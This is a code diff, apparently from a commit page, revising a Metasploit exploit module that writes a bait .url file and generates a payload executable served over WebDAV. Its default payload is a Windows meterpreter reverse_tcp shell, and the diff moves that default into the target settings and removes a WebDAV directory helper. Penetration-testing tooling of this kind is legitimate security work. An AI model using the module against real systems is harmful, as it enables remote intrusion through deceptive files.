44##
55
66class MetasploitModule < Msf ::Exploit ::Remote
7+ include Msf ::Exploit ::Remote ::HttpServer
78 Rank = NormalRanking
89
910 def initialize ( info = { } )
@@ -28,7 +29,18 @@ def initialize(info = {})
2829 ] ,
2930 'Platform' => 'win' ,
3031 'Arch' => ARCH_X64 ,
31- 'Targets' => [ [ 'Windows (generic)' , { } ] ] ,
32+ 'Targets' => [
33+ [
34+ 'Windows (generic)' ,
35+ {
36+ 'Platform' => 'win' ,
37+ 'Arch' => ARCH_X64 ,
38+ 'DefaultOptions' => {
39+ 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
40+ }
41+ }
42+ ]
43+ ] ,
3244 'DefaultTarget' => 0 ,
3345 'Notes' => {
3446 'Stability' => [ CRASH_SAFE ] ,
@@ -42,7 +54,6 @@ def initialize(info = {})
4254 [
4355 OptString . new ( 'OUTFILE' , [ true , 'Output URL file name' , 'bait.url' ] ) ,
4456 OptString . new ( 'PAYLOAD_NAME' , [ true , 'Output payload file name' , 'route.exe' ] ) ,
45- OptString . new ( 'PAYLOAD' , [ true , 'Payload to generate' , 'windows/x64/meterpreter/reverse_tcp' ] ) ,
4657 OptBool . new ( 'GEN_PAYLOAD' , [ true , 'Generate payload and move to WebDAV directory' , true ] ) ,
4758 OptString . new ( 'WEBDAV_DIR' , [ true , 'WebDAV directory path' , '/var/www/webdav' ] )
4859 ]
@@ -60,21 +71,11 @@ def initialize(info = {})
6071 end
6172
6273 def exploit
63- prepare_webdav_dir
6474 generate_payload_if_needed
6575 write_url_file
6676 print_status ( "Module complete. Deliver #{ File . expand_path ( datastore [ 'OUTFILE' ] ) } )
6777 end
6878
69- def prepare_webdav_dir
70- print_status ( 'Creating WebDAV directory if not exists...' )
71- FileUtils . mkdir_p ( datastore [ 'WEBDAV_DIR' ] ) unless File . directory? ( datastore [ 'WEBDAV_DIR' ] )
72- rescue Errno ::EACCES
73- fail_with ( Failure ::NoAccess ,
74- "Cannot create WebDAV directory. Permission denied.\n " \
75- "Try restarting Metasploit with sudo or change ownership of #{ datastore [ 'WEBDAV_DIR' ] } )
76- end
77-
7879 def generate_payload_if_needed
7980 return unless datastore [ 'GEN_PAYLOAD' ]
8081
0 commit comments